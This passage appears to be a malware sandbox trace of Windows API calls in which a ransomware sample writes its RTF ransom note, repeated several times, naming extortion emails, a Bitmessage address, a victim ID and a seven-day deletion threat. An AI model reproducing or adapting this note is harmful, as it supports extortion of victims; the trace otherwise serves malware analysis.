}}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.760] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n=typeof b)return b;try{\x03\x1e", lpUsedDefaultChar=0x0) returned 8717 [0283.760] WriteFile (in: hFile=0x2cc, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.762] CloseHandle (hObject=0x2cc) returned 1 [0283.762] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\#readme_eman#.rtf")) returned 